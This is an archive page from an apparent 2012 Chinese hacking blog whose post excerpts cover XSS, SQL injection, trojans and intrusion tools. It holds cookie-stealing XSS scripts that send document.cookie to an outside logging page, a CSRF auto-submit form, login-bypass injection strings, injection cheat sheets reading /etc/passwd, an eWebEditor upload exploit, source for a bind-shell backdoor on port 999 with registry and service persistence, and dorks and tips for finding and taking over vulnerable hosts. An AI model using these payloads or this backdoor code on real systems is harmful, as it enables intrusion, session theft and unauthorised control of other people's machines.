11 2012 档案

摘要:为了做实验方便,windows中经常要添加一个永远活动的loopback接口,下面是添加loopback接口的方法:开始》控制面板》添加硬件,双击,打开如下图1:图1:图1点击下一步,硬件搜索完毕后,出现图2:图2:点击下一步,选择“是”,点下一步,如图三:图3:选择“添加新的硬件设备”,点击下一步,如图四:图4:选择“安装我手动从列表选择的硬件”,点击下一步:如图五:图5:选择“网络适配器”,然后点击下一步,如图6:图6:在左边的厂商列表里边选择“Microsoft”,网卡选择“Microsoft Loopback Adapter”,点击下一步最后完成安装。最后,在你的网络连接里边就会出现一 阅读全文
posted @ 2012-11-30 19:48 山貓 阅读(395) 评论(0) 推荐(0)
摘要:在Metasploit中编写自己到扫描器是不是很帅到一件事呢?学习一下这段代码:#Metasploitrequire 'msf/core'class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner def initialize super( 'Name' =>'My custom TCP scan', 'Version' =>'$Revision:1$', 阅读全文
posted @ 2012-11-30 09:14 山貓 阅读(321) 评论(0) 推荐(0)
摘要:一、BT5下安装和注册Nessus1、下载nessus。下载网址:http://www.nessus.org/products/nessus/nessus-download-agreement,在该网址中选择Agress后就会进入到下载界面。在下载界面中根据操作系统的不同下载合适的版本,本人下载的是:Ubuntu 9.10 / Ubuntu 10.04 (32 bits)这个版本。2、安装下载的.deb文件。使用dpkg命令。3、创建用户。在终端通过cd命令进入目录 opt/nessus/sbin/ ,再输入命令:nessus-adduser创建一个用户,一路yes。4、去官网进行注册,获取序 阅读全文
posted @ 2012-11-29 16:54 山貓 阅读(843) 评论(0) 推荐(1)
摘要:转自:http://www.myhack58.com/Article/html/3/7/2008/18771.htmXSS跨站脚本攻击属于被动式攻击,对于急于求成的朋友来说,往往不会被重视,而喜欢挂马的朋友则喜爱有加。通过构造特殊的页面,再把调用该页面的代码嵌在被攻击者网站的某一网页中,而当有人浏览该页面时,在后台即已执行了内嵌的代码。对于被调用页面的构造,根据不同的需求功能也不一样。最常见的是挂马,比如利用IE漏洞悄悄在浏览者的计算机上种植木马;而另一种方式则可以利用互动式页面的各种语言(如ASP,PHP,JSP等)来构造一个完全达到自己需求的页面,而不是简单地做一种达到目的的“介质”。 . 阅读全文
posted @ 2012-11-27 13:34 山貓 阅读(850) 评论(0) 推荐(0)
摘要:转自:http://blog.csdn.net/cnbird2008/article/details/4299544http://ha.ckers.org/xss.html关于XSS Proxy技术关于Cross Iframe Trick的思路。让我想到了曾经看到的关于XSS Proxy的一些文章。Advanced Cross-Site-Scripting with Real-time Remote Attacker Control ,精彩之处:还有一篇关于Advanced XSS attacks and XSS-Proxy 的PPT。都是05年的资料了。它的主要思想是:在有XSS漏洞(持久型 阅读全文
posted @ 2012-11-26 22:13 山貓 阅读(355) 评论(0) 推荐(0)
摘要:参考:http://zhchx0827.iteye.com/blog/1681349下面是我测试的代码,贴出来记录一下:<script>document.write('<form name=myForm></form>'); var myForm=document.forms['myForm']; myForm.action='http://192.168.0.100/emlog/?action=guestbook'; myForm.method='POST'; var input = docu 阅读全文
posted @ 2012-11-26 10:25 山貓 阅读(826) 评论(0) 推荐(0)
摘要:<script>document.write('<img src="http://url/news.asp?msg='+document.cookie+'" width=0 height=0 border=0 />');</script>news.asp代码:<%msg=Request.ServerVariables("QUERY_STRING") testfile=Server.MapPath("cook.txt") set fs=server.CreateO 阅读全文
posted @ 2012-11-25 16:08 山貓 阅读(378) 评论(0) 推荐(0)
摘要:转自:http://www.2cto.com/Article/200906/39180.html暗组 zachary大学快毕业了,想起高考时想填的一个学校,由于高考考的比较差,只超过二本十多分,只能往二本中靠低的学校填。首先踩点,打开google输入:site:XXXXXX inurl:asp?id= 搜出很多链接,随便打开了一个,在后面加上单引号,提示如图一所示明显做了防注入过滤。按照我一般的思路是:首先是检查是否有注入点,不行就检查cookie注入,再不行就找别的突破点。清空地址栏,输入:javascript:alert(document.cookie=”id=”+escape(“1556 阅读全文
posted @ 2012-11-25 13:49 山貓 阅读(517) 评论(0) 推荐(0)
摘要:转自:http://hi.baidu.com/orz_men/item/e69491ffc86107ec1b111f86'SQL通用防注入程序'Aseanleung'--------定义部份------------------Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstrDim fso1,all_tree2,file1,files,filez,fs1,zruseripIf Request.QueryString<>"" Then (对Request.QueryString提交(客户 阅读全文
posted @ 2012-11-25 12:45 山貓 阅读(702) 评论(0) 推荐(0)
摘要:有些时候我们在渗透测试的时候需要提交一些假的http头信息或者一些post参数,这时候我们可以用nc来提交,命令是nc -v www.test.com<abc.txt其中www.test.com就是目标网站,abc.txt中就是需要提交的数据,比如我想往一个网页提交一个post参数的值。页面代码是:<?php$auth='0';extract($_POST);if($auth == 1){echo "private!";}else{echo "public";}?>这段代码是我用来测试extract函数的变量覆盖漏洞的, 阅读全文
posted @ 2012-11-23 00:22 山貓 阅读(1172) 评论(0) 推荐(0)
摘要:ini_get是获取php.ini里的环境变量的值.语法string ini_get ( string varname )返回值如果为布尔型则为0或1例:ini_get(register_globals) 阅读全文
posted @ 2012-11-22 17:04 山貓 阅读(210) 评论(0) 推荐(0)
摘要:unset()是注销定义的变量.因为PHP变量是不需要预先定义就可以使用.如果不unset($color),后面的代码如果用到同名的$color,PHP就会使用前面使用过的这个(里面是有值的),如果不重新赋值就使用,可能会影响到正确性. 阅读全文
posted @ 2012-11-22 16:44 山貓 阅读(194) 评论(0) 推荐(0)
摘要:转自:http://blog.csdn.net/miyunhong/article/details/45831822005 msdn url:ms-help://MS.MSDNQTR.v80.chs/MS.MSDN.v80/MS.WINCE.v50.en/wcecoreos5/html/wce50lrfsystemerrorsnumericalorder.htmThe following table shows possible system error values.CodeDescriptionName0The operation completed successfully.ERROR_ 阅读全文
posted @ 2012-11-21 16:36 山貓 阅读(1259) 评论(0) 推荐(0)
摘要:pptv太流氓了!亲自试验,肯定行!然后我吧pptv卸载了,发誓永远不用了1.先把C:\Windows\System32里找到kindling.dll删除2.win+R输入regedit,删除途中文件夹4c5a........或用其他工具把右键4c5a....的项删掉 阅读全文
posted @ 2012-11-21 10:31 山貓 阅读(312) 评论(0) 推荐(0)
摘要:客户端程序代码如下:#pragma comment(lib,"ws2_32.lib")#include<winsock2.h>#include<stdio.h>BOOL InitWinsock();void main(){ SOCKET socket1; InitWinsock(); struct sockaddr_in server; int len=sizeof(server); server.sin_family=AF_INET; server.sin_port=htons(1000); //Server的监听端口为1000 server.si 阅读全文
posted @ 2012-11-20 18:51 山貓 阅读(339) 评论(0) 推荐(0)
摘要:这是个基于TCP Socket的例子,流程是WSAStartup()->socket()->bind()-accept()->send()#pragma comment(lib,"ws2_32.lib")#include<winsock2.h>#include<stdio.h>int main(){ SOCKET mysock,tsock; //定义套接字 struct sockaddr_in my_addr; //本地地址信息 struct sockaddr_in their_addr; //连接者地址信息 int sin_siz 阅读全文
posted @ 2012-11-20 16:48 山貓 阅读(253) 评论(0) 推荐(0)
摘要:以下代码是VC6的代码对系统服务的创建和删除之类的操作,用于木马隐藏技术。#include<stdio.h>#include<winsock2.h>#pragma comment(lib,"ws2_32.lib")void WINAPI ServiceMain(DWORD,LPTSTR *);void WINAPI ServiceCtrlHandler(DWORD Opcode); //服务控制函数BOOL InstallCmdService();void DelServices();void door();SERVICE_STATUS m_Serv 阅读全文
posted @ 2012-11-20 13:07 山貓 阅读(327) 评论(1) 推荐(0)
摘要:下面这段代码是vc++对注册表的一系列操作,还有文件自身的复制功能#include <stdio.h>#include <windows.h>int main(void){ char regname[]="Software\\Microsoft\\Windows\\CurrentVersion\\Run"; HKEY hkResult; int ret; //打开关键字 ret=RegOpenKey(HKEY_LOCAL_MACHINE,regname,&hkResult); ret=RegSetValueEx(hkResult," 阅读全文
posted @ 2012-11-19 22:20 山貓 阅读(381) 评论(0) 推荐(0)
摘要:转自:http://hi.baidu.com/raoxj/item/a50fe81af2ba11f965eabf5c才在网上下了一个Microsoft Visual C++6.0,安装以后,当点击打开按钮时出现错误提示: 点击确定后又出现: 然后就自动退出了。解决方法如下:在官网上下载Vs6sp6.exe,然后安装即可。http://www.microsoft.com/downloads/details.aspx?familyid=a8494edb-2e89-4676-a16a-5c5477cb9713&displaylang=zh-cn 下载完成后,只需将其先解压到随便一个文件夹中, 阅读全文
posted @ 2012-11-19 22:11 山貓 阅读(602) 评论(0) 推荐(0)
摘要:这是个mini木马,要正向连接,通过telnet或nc连接就好。#pragma comment(lib,"ws2_32.lib")#include <winsock2.h>#include <windows.h>#define MasterPort 999 //定义监听端口999main(){ WSADATA WSADa; sockaddr_in SockAddrIn; SOCKET CSocket,SSocket; int iAddrSize; PROCESS_INFORMATION ProcessInfo; STARTUPINFO Startup 阅读全文
posted @ 2012-11-19 20:56 山貓 阅读(994) 评论(1) 推荐(0)
摘要:转自:http://hi.baidu.com/unixshell/item/2b57af1112ec9df9746a8430配置beef和metasploit(包含安装Beef过程)系统环境:BackTrack5R1软件版本:Beef0.4.3.6-alphametasploitv4.4.0-devsvnr15552一、前言之前对于BeEF毫无了解,好奇心驱使下便按部就班研究一下,虽然中途问题多多,但是最后还算成功,收获不少二、安装BeEF按照文章上所指,先删除BT5上面自带的版本稍旧的BeEFrm-rf/pentest/web/beef-ng然后通过Gitclone最新的BeEF代码gitc 阅读全文
posted @ 2012-11-19 11:03 山貓 阅读(1976) 评论(0) 推荐(0)
摘要:转自:http://hi.baidu.com/unixshell/item/396c3e9968dbf4cfb625310cBeEF是目前欧美最流行的web框架攻击平台,它的全称 是theBrowserexploitationframeworkproject.最近两年国外各种黑客的会议都有它的介绍,很多 pentester对这个工具都有很高的赞美。通过XSS这个简单的漏洞,BeEF可以通过一段编制好的javascript控制目标主机的浏览器,通过 浏览器拿到各种信息并且扫描内网信息,同时能够配合metasploit进一步渗透主机,强大的有些吓人。如何配置beef和metasploitwindo 阅读全文
posted @ 2012-11-19 10:32 山貓 阅读(806) 评论(0) 推荐(0)
摘要:转自:http://www.2cto.com/Article/201207/140515.html作者 Joe Lynch[Dis9]1、引言Beef 一个很强大的xss 攻击框架新版的beef 还不是很熟悉2、测试开始msf > beef_connect http://192.168.2.106:3000 beef beef[*] Connected to http://192.168.2.106:3000msf > beef_onlineCurrently hooked browsers within BeEFId IP OS-- -- --0 1.1.1.2 Microsof 阅读全文
posted @ 2012-11-19 08:55 山貓 阅读(1770) 评论(0) 推荐(0)
摘要:在evil.js文件中写如下代码,存储在www.test.com根目录下var img=document.createElement("img");img.src="http://www.test.com/log?"+escape(document.cookie);document.body.appendChild(img);然后在测试页,想办法让别人运行这段代码<script src="http://www.test.com/evil.js"></script>然后在web日志中可查看窃取的cookie信息如 阅读全文
posted @ 2012-11-19 01:43 山貓 阅读(517) 评论(0) 推荐(0)
摘要:首先给个链接给你:http://www.google.com/webhp?hl=xx-hacker你会看到google的页面居然全部是乱码????n0rM4Ls34rChIm46356r00pZd1r3c70rY4DV4NC3D534RC|-|PR3F3R3N(3Z£4|\|6µ463700|54||480u7Google-Google.cominEnglishM4k3GoogleY0ur|-|0m3p463!你一定看不懂!但是Monyer和我的黑客兄弟们却是各个都懂的,因为这个就是传说中的黑客语言!让Monyer先给你翻译一遍!normalsearchimagesgrou 阅读全文
posted @ 2012-11-17 12:18 山貓 阅读(1749) 评论(0) 推荐(0)
摘要:很多新手抓鸡的时候,为了IP段很头疼。有一种方法大家可以试试,我试验过还是可以的。首先选择一个你要扫的城市,比如:浙江打开百度,在里面输入浙江,然后出现一个某某网站,你把网站的地址复制一下然后用啊D或则别的工具转换一下,网站地址转换IP然后出现64.128.78.52(我随便写的)我们扫肉鸡可以选择61.128+15.78.52或则61.128-15.255.255其实意思就是第2个IP地址加上15或则减去15就是这个地址旁边所有的IP地址。 阅读全文
posted @ 2012-11-17 11:00 山貓 阅读(1766) 评论(0) 推荐(0)
摘要:而且在一般情况下,一些功能对管理员来说也是没有必要的。如果你不需要MS SQL Server 的xp_cmdshell(use sp_dropextendedproc "xp_cmdshell"这项功能就不要把xp_cmdshell extended stored proc(扩展存储过程)命令功能留着。 我们只需要在isql窗口中输入:use mastersp_dropextendedproc 'xp_cmdshell'net use 映射盘符: \\肉鸡IP\肉鸡盘符譬如:net use z: \\1.1.1.1\c (把对方的c盘映射成你的z盘),察看一 阅读全文
posted @ 2012-11-17 10:50 山貓 阅读(268) 评论(0) 推荐(0)
摘要:在开了3389终端之后但是连接不上的可能情况:(1).目标服务器是内网 终端端口是你开的话 99%需要端口转发 有时候如果服务器开了终端的话很有可能映射了也不就需要转发(2). 目标是外网 开了3389 但连接不上终端以下是各种情况可能原因及突破办法1. 突破安全狗限制连接终端:突破安全狗限制连接服务器终端:执行杀安全狗的exe2. 突破SecureRDP限制连接终端科普:SecureRDP是一款国外的软件,可以用该软件限制远程桌面登录的计算机名、MAC、IP,指定的才能登陆服务器的远程桌面,否则一律拒绝,支持Windows2003服务器操作系统,以下是这款限制软件的突破方法:执行目录echo 阅读全文
posted @ 2012-11-17 10:48 山貓 阅读(555) 评论(0) 推荐(0)
摘要:在前面已经为大家演示了如何利用工具进行cookie欺骗,然后进入后台。现在我们从程序的角度上来学习如何挖掘代码中存在的cookie欺骗漏洞。还是以第二章中的那个心情网络投票系统来举例。我们先来看看在心情网络投票系统中系统是如何得到cookie的,它的程序其实就上上一节中采用cookie验证的那个例子,代码这里不在列举出来了,可以参考上面的。在上面的代码中,有样的两行代码:response.cookies("admin")=rs("admin")response.cookies("pass")=rs("pass")当 阅读全文
posted @ 2012-11-16 20:07 山貓 阅读(1186) 评论(0) 推荐(0)
摘要:1:"or "a"="a2:'.).or.('.a.'='.a3:or 1=1--4:'or 1=1--5:a'or' 1=1--6:"or 1=1--7:'or.'a.'='a8:"or"="a'='a9:'or''='10:'or'='or' 阅读全文
posted @ 2012-11-16 19:57 山貓 阅读(1198) 评论(0) 推荐(0)
摘要:经典'or'='or'漏洞也叫身份验证登陆漏洞,这是一个比较老的漏洞,不过目前很多系统还是存在这样的漏洞。前面我们已经知道了利用'or'='or'这个漏洞我们就可以顺利的登陆网站后台,那么为什么输入这样的代码就可以进入后台呢?在讲这个漏洞之前我们先来回顾一点点数学知识。就是AND和OR运算符的运算规则,在第5章也讲了,不过为了给大家加深印象,这里还把他们的运算规则列出来。如果在一个关系式里,同时了AND和OR运算符,就会有一个优先级的问题,如果是相同的逻辑符,则按照从左到右的运算顺序。逻辑运算符AND和OR的运算优先次序是:先运算 阅读全文
posted @ 2012-11-16 19:53 山貓 阅读(1405) 评论(0) 推荐(0)
摘要:一、load_file()函数的应用1.获得字段数order by nand 1=2 union select 1,22.load_file()获取敏感信息读取c:\boot.ini信息,要用十六进制的形式and 1=2 union select 1,load_file(0x633A5C626F6F742E696E69)其他敏感信息load_file(char(47)) 列出freebsd目录/etc/passwd读取httpd.conf/etc/init.d/apache/etc/init.d/apache2/etc/httpd/httpd.conf/etc/apache/apache.co 阅读全文
posted @ 2012-11-16 12:20 山貓 阅读(480) 评论(0) 推荐(0)
摘要:转自:博客水木 http://shuimu.js.cn/mysql-php-character-set-encoding-settings-and-garbled-solution.htmlPHP显示MySQL查询结果时显示乱码对于新手在实际编程中是经常会遇到的问题,我们在接下来的文章中将会为大家具体介绍PMySQL字符集编码设置与PHP显示乱码的解决办法,希望对有需要的朋友们有所帮助。从乱码产生的原因来分析,乱码的产生一般有以下几种情况。1、网页编码与程序编码不一致的问题所谓的网页编码问题就是指你的html代码中定义的“charset”,例如以下这段代码:<head><ti 阅读全文
posted @ 2012-11-16 10:46 山貓 阅读(346) 评论(0) 推荐(0)
摘要:转自:博客水木 http://shuimu.js.cn/php-mysql-dynamic-web-programming-error-correction-guide.html在WEB编程当中,数据库的作用已经越来越不容忽视。提到数据库,应当说PHP具有非常强大的数据库支持功能,从Access到Oracle,几乎 与所有的数据库系统都可以实现无缝连接。为了方便本文的讲解,我们将主要以MySQL为例进行说明。不过对于其它的数据库应用也同样适用。使用PHP进行数据库操作一般需要包括以下语句:<?php$Host="localhost";$MySQL_UserName=& 阅读全文
posted @ 2012-11-16 10:41 山貓 阅读(256) 评论(0) 推荐(0)
摘要:<html><head><title>mysql注入漏洞测试</title></head><body><?php$mysql_server_name='localhost';$mysql_username='root';$mysql_password='shanmao';$conn=mysql_connect($mysql_server_name,$mysql_username,$mysql_password)or die('Could not connect: 阅读全文
posted @ 2012-11-16 10:38 山貓 阅读(240) 评论(0) 推荐(0)
摘要:转自:http://www.2cto.com/database/201208/150897.html设置MySql5.5数据库的字符编码为UTF8,解决中文乱码问题1.在mysql压缩目录下,有一堆的参数配置文件,比如:my-small.ini,复制一下这个文件,自己改下名字,比如叫:my.ini 2.打开my.ini文件,增加如下参数: [client]:增加default-character-set=utf8参数 [client] #password = [your_password] port = 3306 socket = /tmp/mysql.sock default-charact 阅读全文
posted @ 2012-11-16 08:47 山貓 阅读(499) 评论(0) 推荐(0)
摘要:1.标准的xss漏洞测试代码<script>alert('xss')</script>2.img图片标记属性跨站攻击代码<img src="javascript:alert(/xss/)"></img><img dynsrc="javascript:alert('xss')">3.无需"<>",利用html标记事件属性跨站(1)利用已知事件<img src="" onerror=alert("xs 阅读全文
posted @ 2012-11-16 06:22 山貓 阅读(3087) 评论(0) 推荐(1)
摘要:<% //这是ASP的标记str=trim(request("a")) //request对象作用是获取客户端表单中输入的数据response.write str //response也是ASP的一个对象,write是它的一个方法,其作用是往页面中输出//数据,在这里就是在页面中输出strresponse.write "<br>"response.write "<img src="&str&"></img>"%><form action=xss. 阅读全文
posted @ 2012-11-16 03:58 山貓 阅读(333) 评论(0) 推荐(0)
摘要: 阅读全文
posted @ 2012-11-15 23:10 山貓 阅读(277) 评论(0) 推荐(0)
摘要:上篇博客讲到了通过BurpSuit实现NC上传,今天将演示用BurpSuit破解WebShell的验证密码。其实,就破解而言,BurpSuit的基本原理和溯雪是一样的,但是在某些功能上要比前者完善一些。OK,Let'sGo!!!首先,在WebShell密码框处输入一个任意密码,以便抓取密码验证请求包。至于怎么抓取,这里就不多费口舌了,可以参考我的上一篇博客。分析数据包后,发现该请求包有两个重要参数(Pass和Cookie,红色字体部分),我们要测试的只有Pass参数。在History标签中找到我们要修改的请求包,右击→选择sendtointruder,接着就来到了Intruder模块。 阅读全文
posted @ 2012-11-15 22:50 山貓 阅读(811) 评论(0) 推荐(0)
摘要:文章来源莲山课件www.5YKJ.Com1Fckeditor漏洞利用总结查看编辑器版本FCKeditor/_whatsnew.html—————————————————————————————————————————————————————————————2.Version2.2版本Apache+linux环境下在上传文件后面加个.突破!测试通过。—————————————————————————————————————————————————————————————3.Version<=2.4.2Forphp在处理PHP上传的地方并未对Media类型进行上传文件类型的控制,导致用户上传 阅读全文
posted @ 2012-11-15 22:48 山貓 阅读(423) 评论(0) 推荐(0)
摘要:作者:月无痕&&花非花来源:红狼安全小组(www.wolfexp.net,www.crst.com.cn)注:本文以发表于黑客手册,转载请加上出处一.接触起因这几天事情较多,一直都没去老大的论坛转!今天好友joli突然Q我说论坛上有人发了个脚本的问题,叫我也一起看一下,于是我就跑过去看了下(你家离论坛很近?竟然可以跑着过去!),也就有了下面这篇文章(测试版本为讯时新闻发布系统v2.70版 )。二.漏洞初探打算先看有没有经典的OR漏洞,虽然已经出来很久的漏洞了,但是很多程序仍然会存在这样的漏洞,admin_login.asp存在如下代码:if request("user 阅读全文
posted @ 2012-11-15 22:44 山貓 阅读(299) 评论(0) 推荐(0)
摘要:这套系统有N年版,一般的政府、学校和企事业单位用得多,特证: 显示新闻News_View.asp?NewsID= 登陆login.asp?id=3,最主要的特证是用的一个有一个EDIT目录,下面的数据库是用的db/#ewebeditor.asp以上特证只要中二个就基本可以肯定是这套系统漏洞:这套系统原来有N多漏洞,但经过改进,现在主要的问题是COOKIES注入和列目录问题具体的代码我就讲了,直接讲利用第一板斧:老版中存在一个后台COOKIES注入直接打开登陆后台,然后在地址栏输入javascript:alert(document.cookie="adminuser="+es 阅读全文
posted @ 2012-11-15 22:42 山貓 阅读(714) 评论(0) 推荐(0)
摘要:今天学习网络渗透,到网上寻找一下猎物。找到一个学校的网站,我一看http://www.test.com/xsnews/News_View.asp?NewsID=249这样的网址,知道又碰到讯时新闻系统了,学校用这个系统的还真不少。前几次用以前的漏洞,进去过,但是讯时对那些太老的漏洞都已经打了补丁。这次我还是用那三板斧都试了已通,未果。我想起来有篇文章叫《三顾讯时--对讯时新闻发布系统的艰难突破》http://huaidan.org/archives/1023.html,开始总是没有耐心看完,这次我耐心看了一遍,好多分析过程,引用了不少漏洞代码,总之漏洞页在admin_news_view.asp 阅读全文
posted @ 2012-11-15 22:40 山貓 阅读(231) 评论(0) 推荐(0)
摘要:1.到GoogLe,搜索一些关键字,edit.asp? 韩国肉鸡为多,多数为MSSQL数据库! 2.到Google ,site:cq.cn inurl:asp 3.利用挖掘鸡和一个ASP木马. 文件名是login.asp 路径组是/manage/ 关键词是went.asp 用'or'='or'来登陆 4.关键字:Co Net MIB Ver 1.0网站后台管理系统 帐号密码为 'or'='or' 5.动感购物系统 inurl:help.asp登陆,如未注册成为会员! upLoad_bm1.asp和upLoad_c1.asp这两个随 阅读全文
posted @ 2012-11-15 22:38 山貓 阅读(1536) 评论(0) 推荐(0)
摘要:一、having与group by查询报表名与字段名 1.当确定有注入点以后,直接提交having 1=1-- 在错误信息里面即可得到当前表名的第一个字段。 2.然后提交 group by 字段名1 having 1=1-- 即可得到第二个字段 3.然后 group by 字段名1,字段名2 having 1=1-- 4.group by 字段名1,字段名2,字段名3,字段名n having 1=1-- 直到返回正常信息,即可得到所有的字段名 二、order by与数据类型转换报错法 1.爆所有数据库名 and db_name()=0-- 爆当前库名 and db_name(n)>0-- 阅读全文
posted @ 2012-11-15 22:01 山貓 阅读(584) 评论(0) 推荐(0)
摘要:一、基本信息搜集 1.注入点类型的判断 and exists (select * from sysobjects) 2.注入点权限判断 and 1=(select is_srvrolemember('sysadmin')) //判断是否是系统管理员 and 1=(select is_srvrolemember('db_owner')) //判断是否是库权限 and 1=(select is_srvrolemember('public')) //判断是否为public权限 3.其他信息获取 ;declare @d int //判断MsSQL支持多行 阅读全文
posted @ 2012-11-15 03:20 山貓 阅读(965) 评论(0) 推荐(0)
摘要:<H1>ewebeditorasp版2.1.6上传漏洞利用程序----</H1><br><br><formaction="http://127.1/e/upload.asp?action=save&type=IMAGE&style=luoye'unionselectS_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt,[S_ImageExt]%2b'|cer',S_Me 阅读全文
posted @ 2012-11-14 20:59 山貓 阅读(1299) 评论(0) 推荐(0)
摘要:转载自:http://www.forece.net/post/2513.htm不知道是不是很多人像我一样,很喜欢这类黑客解谜游戏,感觉很锻炼脑子,当时黑客防线推出那款黑客游戏,有一关,我想了足足8个小时,也不觉得累。后来华夏等网站相继推出黑客游戏,我是乐此不疲。在网上也找了很多国外的黑客游戏。这里是我收集的一些黑客游戏,有网页版的,有客户端版的。对于黑客游戏,不仅仅是锻炼自己的推理能力,而且还能让自己的思维更加活泼。不过电脑小白就不要玩了。。。。。。。很可能想爆了脑袋也过不去一关。这里需要很多的知识,Java,PHP,HTML,Javascript等网页语言,另外有的游戏还需要了解程序的加壳脱 阅读全文
posted @ 2012-11-14 20:59 山貓 阅读(2461) 评论(0) 推荐(0)
摘要:SQL注入是从正常的 WWW 端口访问,而且表面看起来跟一般的 Web 页面访问没什么区别,所以目前市面的防火墙都不会对SQL注入发出警报,如果管理员没查看 IIS 日志的习惯,可能被入侵很长时间都不会发觉。 但是,SQL注入的手法相当灵活,在注入的时候会碰到很多意外的情况。能不能根据具体情况进行分析,构造巧妙的SQL语句,从而成功获取想要的数据,是高手与“菜鸟”的根本区别。 根据国情,国内的网站用 ASP+Access 或 SQLServer 的占 70% 以上,PHP+MySQ 占 20%,其他的不足 10%。在本文,我们从分入门、进阶至高级讲解一下 ASP 注入的方法及技巧,PHP 注入 阅读全文
posted @ 2012-11-14 20:57 山貓 阅读(229) 评论(0) 推荐(0)
摘要:cookie注入绕过SQL通用防注入程序ASP是按QueryString,from,cookie,servervariable,集合的顺序来搜索的,在request对象成员中集合cookies,它 的意思是"读取用户系统发送的所有cookie值,我们从第二讲关于"cookies欺骗入侵和原理"中知道,cookies是保存在客户端计算机的一个 文本文件,可以进行修改,这样一来,我们就可以使用Request.cookie方式来提交变量的值,从而利用系统的漏洞进行注入攻击.我们首先还是来看看中网景论坛的最新版本"(CNKBBS2007)中网景论坛2007v5. 阅读全文
posted @ 2012-11-14 20:53 山貓 阅读(902) 评论(0) 推荐(0)
摘要:最近在学习mssql注入漏洞,一直找不到合适的网站系统,自己做了个有漏洞的连接数据库的代码来实验。<html><head><title>sql注入漏洞测试</title></head><body><%MM_conn_STRING = "Driver={SQL Server};server=(local);uid=sa;pwd=123;database=test;"Set conn = Server.Createobject("ADODB.Connection")conn.ope 阅读全文
posted @ 2012-11-14 15:05 山貓 阅读(382) 评论(0) 推荐(0)